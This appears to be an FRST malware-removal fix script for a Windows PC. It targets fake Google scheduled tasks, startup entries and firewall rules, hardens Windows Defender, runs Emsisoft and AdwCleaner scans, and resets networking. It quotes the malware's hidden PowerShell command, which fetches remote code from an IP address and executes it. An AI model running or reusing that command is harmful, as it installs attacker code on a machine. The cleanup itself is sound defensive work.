Malware Log Analysis

Start:: CreateRestorePoint: CloseProcesses: 2026-04-29 12:08 - 2026-04-29 22:36 - 000000000 ____D C:\Users\iamto\pp.exe 2026-04-29 12:07 - 2026-01-11 12:04 - 000000000 ____D C:\Users\iamto\AppData\Roaming\RenPy FirewallRules: [TCP Query User{925DC12F-6DB7-4565-A1D6-C762B157C180}C:\users\iamto\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\iamto\appdata\roaming\spotify\spotify.exe => No File FirewallRules: [UDP Query User{6C329461-70B5-47F5-BEF0-75E7C32FEF69}C:\users\iamto\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\iamto\appdata\roaming\spotify\spotify.exe => No File FirewallRules: [{AF2FE679-E12B-4BA5-866D-B04C84A1D1D3}] => (Allow) E:\Hytale\install\pre-release\package\game\latest\Client\HytaleClient.exe => No File FirewallRules: [{4018065F-ABEC-42FC-AA9B-F71482252768}] => (Allow) E:\Hytale\install\pre-release\package\game\latest\Client\HytaleClient.exe => No File FirewallRules: [{981571D6-56A0-4EF9-80C1-474D7D7A72C8}] => (Allow) E:\Hytale\install\pre-release\package\jre\latest\bin\java.exe => No File FirewallRules: [{D92D9F13-6BA5-453C-80FD-9B2F1FEAD314}] => (Allow) E:\Hytale\install\pre-release\package\jre\latest\bin\java.exe => No File FirewallRules: [{D2B1A051-58CB-4C5E-815C-78328B6A4660}] => (Allow) C:\Program Files\Razer\RazerAppEngine\app-4.0.660\RazerAppEngine.exe => No File S4 AmdTools64; \SystemRoot\System32\drivers\AmdTools64.sys (No File) S3 EAAntiCheat; system32\drivers\eaanticheat.sys (No File) S3 MpKslb48901b8; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{4FBF6DB0-19C8-4B8C-9B36-43D86D6A41C9}\MpKslDrv.sys (No File) S3 SIUSBXP; \??\C:\Windows\system32\drivers\SiUSBXp.sys (No File) HKU\S-1-5-21-1170504821-116563046-2204524539-1001\...\Run: [Player2] => C:\Users\iamto\AppData\Local\Player2\player2.exe [83643184 2026-04-22] (ELEFANT AI INC. -> player2) <==== ATTENTION Task: {B9651CD1-3367-466F-BD00-7827B6F06E3E} - System32\Tasks\Google Compatibility Appraiser CL_NCL_475b30882d9b5208 => C:\Windows\system32\conhost.exe [867840 2026-01-13] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION Task: {9F01C1F5-6016-4304-A6D8-DC5A996B3E2E} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem47.0.7703.CL_NCL_475b30882d9b5208{47263A17-2D66-43B9-9692-56314D0C1AEC} => C:\Windows\system32\conhost.exe [867840 2026-01-13] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION Folder: C:\Users\iamto\AppData\Local\Player2 2026-04-29 12:08 - 2026-04-29 12:08 - 000004410 _____ C:\Windows\system32\Tasks\Google Compatibility Appraiser CL_NCL_475b30882d9b5208 StartPowershell: Try { $Paths=(Get-MpPreference).ExclusionPath $Extensions=(Get-MpPreference).ExclusionExtension $Processes=(Get-MpPreference).ExclusionProcess foreach ($Path in $Paths) { Remove-MpPreference -ExclusionPath $Path -force -ErrorAction Stop } foreach ($Extension in $Extensions) { Remove-MpPreference -ExclusionExtension $Extension -force -ErrorAction Stop } foreach ($Process in $Processes) { Remove-MpPreference -ExclusionProcess $Process -force -ErrorAction Stop } } Catch { Write-Error "Error occurred while removing Windows Defender exclusions: $_" } EndPowershell: StartPowerShell: # Enable real-time protection Set-MpPreference -DisableRealtimeMonitoring $false # Enable behavioural protection Set-MpPreference -DisableBehaviorMonitoring $false # Enable PUP detection Set-MpPreference -PUAProtection Enabled # Enable cloud protection to level 4 - aggressively block unknowns and apply additional protection measures, alternatively use 2 for lower protection or 0 for default Set-MpPreference -CloudBlockLevel 4 # Send advanced information about malicious/unwanted software present on your device Set-MpPreference -MAPSReporting 2 # Send safe samples automatically to Microsoft Set-MpPreference -SubmitSamplesConsent 1 # Enables inspection of HTTP traffic to detect malicious websites Set-MpPreference -EnableNetworkProtection Enabled # Enables block at first seen Set-MpPreference -DisableBlockAtFirstSeen $false # Allows scanning of archive files, such as .zip and .cab files for malware/PUP Set-MpPreference -DisableArchiveScanning $false # Enables automatic scanning of USB & removal drives Set-MpPreference -DisableRemovableDriveScanning $false # Enables scanning of network files Set-MpPreference -DisableScanningNetworkFiles $false # Forces signature check before running a scan Set-MpPreference -CheckForSignaturesBeforeRunningScan $true # Extends cloud check timer from default 10 to 30 seconds Set-MpPreference -CloudExtendedTimeout 30 # Enables automatic scanning of all downloaded files and attachments Set-MpPreference -DisableIOAVProtection $false # Enables script detection Set-MpPreference -DisableScriptScanning $false # Disables automatic exclusions from scanning Set-MpPreference -DisableAutoExclusions 1 # Enables scanning of mapped network drives Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 0 # Enables scanning of email files Set-MpPreference -DisableEmailScanning 0 # Enables blocking of malicious domains and IP's on DNS level Set-MpPreference -EnableDnsSinkhole $true # Enables signature updates every 12 hours Set-MpPreference -SignatureUpdateInterval 12 # Enables automatic quarantine for threats labelled as high and severe Set-MpPreference -HighThreatDefaultAction Quarantine Set-MpPreference -SevereThreatDefaultAction Quarantine # Updates signatures Update-MpSignature EndPowerShell: StartPowerShell: # This snippet downloads Emsisoft Emergency Kit (EEK) from the Emsisoft's official site, updates it, scans with it. # Do note that the executable is 300MB and may take some time to download. # --- # This will scan for malware and PUP's in 1) system memory 2) important folders as documentation says # It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests # --- # You can use argument "/delete" to delete found objects including references but this is permanent and irreversible. # You can remove the "/quick" argument to do a full scan but that may take longer than what FRST can handle. # You can use argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections. $downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe" $systemDrive = $env:SystemDrive $frstPath = "$systemDrive\FRST" $savePath = "$frstPath\EEK.exe" $extractPath = "$frstPath\EEK" if (-not (Test-Path $frstPath)) { New-Item -Path $frstPath -ItemType Directory -Force | Out-Null } if (-not (Test-Path $extractPath)) { New-Item -Path $extractPath -ItemType Directory -Force | Out-Null } Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing $proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru while (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) { Start-Sleep -Milliseconds 1000 } Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue if ([Environment]::Is64BitOperatingSystem) { $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe" } else { $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe" } Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow Get-Content "$frstPath\EEK_scan.log" exit EndPowerShell: StartPowerShell: # Downloads newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log in console # Does not clean preinstalled objects, only PUP/Adware # If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument # If you would like to only scan with it, change the argument from /clean to /scan New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden $logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt" Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile Get-Content $logFile -Encoding Unicode Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue EndPowerShell: CMD: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Warn" /f CMD: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 1 /f CMD: netsh int ip reset CMD: netsh int ipv6 reset CMD: ipconfig /flushDNS CMD: netsh winsock reset catalog C:\Users\CurrentUserName\AppData\Local\Temp\* C:\Windows\Temp\* C:\Windows\SystemTemp\* EmptyTemp: End::